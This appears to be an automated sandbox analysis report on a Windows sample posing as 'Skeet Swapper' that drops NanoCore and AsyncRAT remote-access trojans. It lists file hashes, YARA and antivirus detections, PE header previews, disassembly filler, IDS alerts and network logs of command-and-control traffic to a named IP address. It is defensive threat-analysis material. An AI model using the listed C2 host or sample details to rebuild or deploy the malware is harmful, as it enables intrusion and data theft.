                                                  SHA-512:B3B11F8E5B495C873A8AFA58FDC2F2FEF7E7D610A50516FB701DAB1197AC11A63E5F857F9B6ECF1A9B33FDF0D875ECF59695BE83FF35AFCBC23F8293D068E8FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Florian Roth
                                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F..Q............m.>.....m...F...m.........3.........V...m.......m.=.....Rich............................PE..L....0.N.................z..........H2............@.......................................@.....................................<..................................`...............................H...@...............$............................text...Bx.......z.................. ..`.rdata...1.......2...~..............@..@.data...............................@....rsrc..............................@..@.reloc...............r..............@..B................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):48640
                                                  Entropy (8bit):5.570150307144179
                                                  Encrypted:false
                                                  SSDEEP:768:+uC+NTdxtrhWU5GGLmo2qrqSl3bXPINKI0b8Kh9BQT3PILo/zeHnK2mtvIA6BDZy:+uC+NTdrF2AbQNKjb8Ia3PSo7eHEvXkI
                                                  MD5:807474FC253612359DC697E331F01B43
                                                  SHA1:D998BCDF573EB66781BBE931B2CA8B35492908CE
                                                  SHA-256:1E2B305D0A5CE914591F712FE0B53BE279D0EC8E598CEC95FA6CFDC6CB94C4B5
                                                  SHA-512:C2916E62D8B7B0AD214D57E2DC0DD5B0F910E06F2D070E0390612FD33C2EE416F252FBA4FE3F523114ACC14924BCFDA105A9B4379AD443F1010BB29010B83ADF
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\SYSTEM32.EXE, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^................................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Y...v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vr.%.p~....(o....#...*.s...
                                                  Process:C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):979968
                                                  Entropy (8bit):6.921853304341562
                                                  Encrypted:false
                                                  SSDEEP:24576:HnsJ39LyjbJkQFMhmC+6GD9vApfbZXJfw:HnsHyjtk2MYC5GDtA1U
                                                  MD5:6278F321B0B9C85A0DF4E485A8DE7993
                                                  SHA1:48FE65A144AEE7A9B437D7C8AE9BD5BFE5409D81
                                                  SHA-256:4DC8CC4ECD4D173A024C221C61F282028BD03967C631EC6827544A36D036952A
                                                  SHA-512:FDBA000C5AB7BA6AAA4E2F94F248003D3505206B3B23AA03565BF0C36FA4C4A7654498A5002A979CB9D042E9F216FDFFF21ECB4CB57883A0B2B35B020CDFEB6D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................T....................@..........................P...................@..............................B*......0K...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0K.......L..................@..P....................................@..P........................................................................................................................................
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4171264
                                                  Entropy (8bit):7.942432292986639
                                                  Encrypted:false
                                                  SSDEEP:98304:dAdDDetDKXiJb1VVmkM2YJlAdDDetDKXiJb1VVmkM3YJ:dAdmZHJxVVm/26AdmZHJxVVm/3
                                                  MD5:46CFD9EFDDF98B4F1A57A69F3809D9BF
                                                  SHA1:5BD87CD64A90D8DDC194A9C3CA30A50F6136B7A5
                                                  SHA-256:7704A9C5892432FB9FC7598D2AA2043DDFE66774516E22081B5588B649942875
                                                  SHA-512:099FDDDBB8204118290FA34945B615C32FC43F35C014F7878541586FACB105E02845FCBBD7E3CF185BF3FDB3773F1EBF5D3E39776F3F9EDFB797D8B36DC69991
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a......................#.....N.... ........@.. ........................@...........@.....................................K.........#...................?...................................................... ............... ..H............text...T.... ...................... ..`.rsrc.....#.......#.................@..@.reloc........?.......?.............@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:Microsoft Excel 2007+
                                                  Category:dropped
                                                  Size (bytes):18387
                                                  Entropy (8bit):7.523057953697544
                                                  Encrypted:false
                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2083328
                                                  Entropy (8bit):7.943244956522882
                                                  Encrypted:false
                                                  SSDEEP:49152:NnA21ODDkXkNpkDWti0EcFKPxqq1VVmkvavPvYMo:NAdDDetDKXiJb1VVmkM3YJ
                                                  MD5:BFF363A92AC43FF249652A83DADC02AB
                                                  SHA1:3C7B47A3F4DC3C8555B656505244886CB3A172F5
                                                  SHA-256:D054E33DE2D63966C68B44DD1D1DE8A9B7ABB76781100FE82423C80E112D4580
                                                  SHA-512:8CEEF643926251A6D6B5FFEE6E662B68580992117D98DBD24CCFDE5CDAD429CE4719A92C63F470C2857272330C9F3A4A2D7F175A6300D6B1833A387F4B841D29
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................B......N.... ........@.. ....................... ...........@.....................................K........?.................... ...................................................... ............... ..H............text...T.... ...................... ..`.rsrc....?.......@..................@..@.reloc........ .....................@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.943244956522882
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:y8kdmHi6x3.exe
                                                  File size:2083328
                                                  MD5:bff363a92ac43ff249652a83dadc02ab
                                                  SHA1:3c7b47a3f4dc3c8555b656505244886cb3a172f5
                                                  SHA256:d054e33de2d63966c68b44dd1d1de8a9b7abb76781100fe82423c80e112d4580
                                                  SHA512:8ceef643926251a6d6b5ffee6e662b68580992117d98dbd24ccfde5cdad429ce4719a92c63f470c2857272330c9f3a4a2d7f175a6300d6b1833a387f4b841d29
                                                  SSDEEP:49152:NnA21ODDkXkNpkDWti0EcFKPxqq1VVmkvavPvYMo:NAdDDetDKXiJb1VVmkM3YJ
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................B......N.... ........@.. ....................... ...........@................................
                                                  Icon Hash:608c8c0c644c9c24
                                                  Entrypoint:0x5ca54e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x61E2968E [Sat Jan 15 09:40:30 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1ca500         0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1cc000         0x33fe8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x200000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x1c8554      0x1c8600  False     0.999514259792   data       7.99980395725   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x1cc000         0x33fe8       0x34000   False     0.535376915565   data       6.00356457348   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x200000         0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name           RVA       Size     Type                                                                         Language  Country
RT_ICON        0x1cc4b8  0x33928  dBase IV DBT of \220\001.DBF, blocks size 0, block length 8192, next free block index 40, next free block 4280639354, next used block 4280835192
RT_GROUP_ICON  0x1ffde0  0x14     data
RT_VERSION     0x1cc130  0x384    data
RT_MANIFEST    0x1ffdf8  0x1ea    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

DLL          Import
mscoree.dll  _CorExeMain

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Skeet Swapper
Assembly Version  1.2.3.4
InternalName      Skeet Swapper1.exe
FileVersion       1.2.3.4
CompanyName       Skeet Swapper
LegalTrademarks   Skeet Swapper
Comments          Skeet Swapper
ProductName       Skeet Swapper
ProductVersion    1.2.3.4
FileDescription   Skeet Swapper
OriginalFilename  Skeet Swapper1.exe

Timestamp                 Protocol  SID      Message                             Source Port  Dest Port  Source IP    Dest IP
01/26/22-02:40:16.178063  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49751        53811      192.168.2.3  54.38.136.57
01/26/22-02:40:20.931845  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49755        53811      192.168.2.3  54.38.136.57
01/26/22-02:40:25.414443  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49757        53811      192.168.2.3  54.38.136.57
01/26/22-02:40:45.303270  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49783        53811      192.168.2.3  54.38.136.57
01/26/22-02:40:49.565803  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49785        53811      192.168.2.3  54.38.136.57
01/26/22-02:40:53.833969  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49786        53811      192.168.2.3  54.38.136.57
01/26/22-02:41:13.666122  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49804        53811      192.168.2.3  54.38.136.57
01/26/22-02:41:17.949071  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49812        53811      192.168.2.3  54.38.136.57
01/26/22-02:41:22.425720  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49829        53811      192.168.2.3  54.38.136.57
01/26/22-02:41:42.814547  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49848        53811      192.168.2.3  54.38.136.57
01/26/22-02:41:47.074662  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49853        53811      192.168.2.3  54.38.136.57
01/26/22-02:41:51.190384  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49855        53811      192.168.2.3  54.38.136.57

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jan 26, 2022 02:40:06.382941961 CET  49749        48129      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:06.422976017 CET  48129        49749      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:06.423192978 CET  49749        48129      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:06.475699902 CET  48129        49749      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:06.475821972 CET  49749        48129      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:06.674309015 CET  49749        48129      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:06.713202000 CET  48129        49749      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:15.267210960 CET  49751        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:15.304814100 CET  53811        49751      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:15.304970026 CET  49751        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:15.459533930 CET  53811        49751      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:15.459620953 CET  49751        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:16.178062916 CET  49751        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:16.179632902 CET  49751        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:16.215821028 CET  53811        49751      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:17.976990938 CET  49752        8808       192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:18.016222954 CET  8808         49752      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:18.624900103 CET  49752        8808       192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:18.663444042 CET  8808         49752      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:19.327810049 CET  49752        8808       192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:19.366137028 CET  8808         49752      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:20.867247105 CET  49755        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:20.904031038 CET  53811        49755      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:20.904757977 CET  49755        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:20.931844950 CET  49755        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:20.955421925 CET  53811        49755      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:20.957093954 CET  49755        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:20.957670927 CET  49755        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:20.993757963 CET  53811        49755      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:25.376806974 CET  49757        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:25.413328886 CET  53811        49757      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:25.413567066 CET  49757        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:25.414443016 CET  49757        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:25.450689077 CET  53811        49757      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:25.450952053 CET  49757        53811      192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:25.464041948 CET  53811        49757      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:25.487231016 CET  53811        49757      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:31.265311003 CET  49760        8808       192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:31.303777933 CET  8808         49760      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:31.811641932 CET  49760        8808       192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:31.849983931 CET  8808         49760      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:32.450469971 CET  49760        8808       192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:32.489135027 CET  8808         49760      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:37.630414009 CET  49763        8808       192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:37.669182062 CET  8808         49763      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:38.314218044 CET  49763        8808       192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:38.352937937 CET  8808         49763      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:38.923297882 CET  49763        8808       192.168.2.3     54.38.136.57
Jan 26, 2022 02:40:38.962126017 CET  8808         49763      54.38.136.57    192.168.2.3
Jan 26, 2022 02:40:40.723352909 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:40.723397017 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:40.723404884 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:40.723468065 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:40.723547935 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:40.724471092 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.081263065 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.081298113 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.081397057 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.081435919 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.135405064 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.135466099 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.135528088 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.135582924 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.136308908 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.136394978 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.136778116 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.136868000 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.578936100 CET  49768        80         192.168.2.3     69.42.215.252
Jan 26, 2022 02:40:41.768156052 CET  80           49768      69.42.215.252   192.168.2.3
Jan 26, 2022 02:40:41.768279076 CET  49768        80         192.168.2.3     69.42.215.252
Jan 26, 2022 02:40:41.833442926 CET  49768        80         192.168.2.3     69.42.215.252
Jan 26, 2022 02:40:41.896397114 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.896425009 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.896862030 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.896934986 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.900217056 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.901747942 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.901777983 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.902169943 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.902299881 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.902975082 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:41.941867113 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:41.945875883 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.046803951 CET  80           49768      69.42.215.252   192.168.2.3
Jan 26, 2022 02:40:42.046902895 CET  49768        80         192.168.2.3     69.42.215.252
Jan 26, 2022 02:40:42.090948105 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.091114998 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.091198921 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.107141018 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.107242107 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.107389927 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.232817888 CET  49766        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.232846975 CET  49765        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.232851982 CET  443          49766      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.232863903 CET  443          49765      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.234947920 CET  49770        443        192.168.2.3     142.250.186.46
Jan 26, 2022 02:40:42.234982014 CET  443          49770      142.250.186.46  192.168.2.3
Jan 26, 2022 02:40:42.235112906 CET  49771        443        192.168.2.3     142.250.186.46
